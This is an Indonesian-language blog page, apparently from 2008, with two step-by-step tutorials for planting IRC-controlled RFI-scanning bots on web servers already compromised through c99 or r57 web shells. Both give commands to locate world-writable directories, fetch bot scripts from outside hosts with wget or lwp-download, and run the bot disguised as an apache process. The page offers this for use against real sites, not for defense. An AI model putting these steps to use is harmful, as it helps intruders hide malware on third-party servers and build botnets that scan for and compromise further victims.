Senin, 15 September 2008
Sabtu, 13 September 2008
Undangan Buat Rekan"
Jumat, 12 September 2008
Rabu, 03 September 2008
Cara Pembuatan Bot PHP di mIRC Lewat Shell Injection
Langkah-langkahnya adalah sebagai berikut :
1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
2. Masuk ke shell web injection anda
3. Cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
4. Yang perlu diingat adalah cari directory yang memberikan permission lengkap ato 777 di subdirektori dari public html web tersebut. Maksudnya adalah untuk dapat mengakses dan membuat botnya. Jadi anda tidak bisa menguploadnya ke directory tmp.
5. Setelah anda menemukan direktori yang cocok, wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya saya, jadi commandnya “wget geocities.com/rah_polenk/files/bot.txt”
6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://www.geocities.com/rah_polenk/files/bot.txt”
7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari geocities.com/rah_polenk/files/bot.txt
8. Saya anggap script tersebut udah di upload, maka gantilah nama filenya dengan command “mv bot.txt bot.php”
9. Ingatlah.. bahwa anda harus menguploadnya ke subdirectory dari public html web yang anda injeksi. semisal seperti ini, nama webnya adalah www.target.com dan saya menguploadnya ke subdirectory module. jadi link untuk mengaksesnya adalah www.target.com/module/bot.php
10. Maka arahkan browser anda dengan membuka link bot anda. jadi bukalah link www.target.com/module/bot.php
11. Ikuti langkah pembuatannya..
12. Masuklah ke channel IRC tempat anda mensetting dimana bot anda akan muncul
13. Jika berhasil, maka bot akan pm/pv anda
14. Kemudian ketik “!auth password” contohnya “!auth lenkganteng” agar anda dikenali oleh botnya
15. Dan untuk melihat list helpnya ketik “!help”
Ket :
1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
3. Semua command di atas tanpa tanda petik dua (”)
Sekian.. semoga membantu…
Cara Membuat Bot Scan RFI di mIRC
Ditulis oleh Entonk/pada 26 Agustus, 2008
Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. Anda bisa dapatkan scriptnya di page script collection blog saya ini. saya anggap anda sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 dan r57 sebagai panduannya.
ok.. kita mulai.
- Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
- Masuk ke shell anda
- cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
- jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
- wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
- jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
- kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt
- Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”
- Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”
- Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help
- Silahkan dipergunakan sebaik mungkin
Ket :
- Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
- Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
- Semua command di atas tanpa tanda petik dua (”)
Semoga membantu…
Credit to : dr.pluto
Editing sedikit :
banyak rekan yang menanyakan kenapa bot tidak jalan? banyak faktor yang menyebabkan hal tersebut
- Shell lambat
- Script yang tidak mau jalan di shell
sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..
Dan untuk selanjutnya, mungkin akan saya buat artikel mengenai bot scan yang lainnya. jadi harap ditunggu..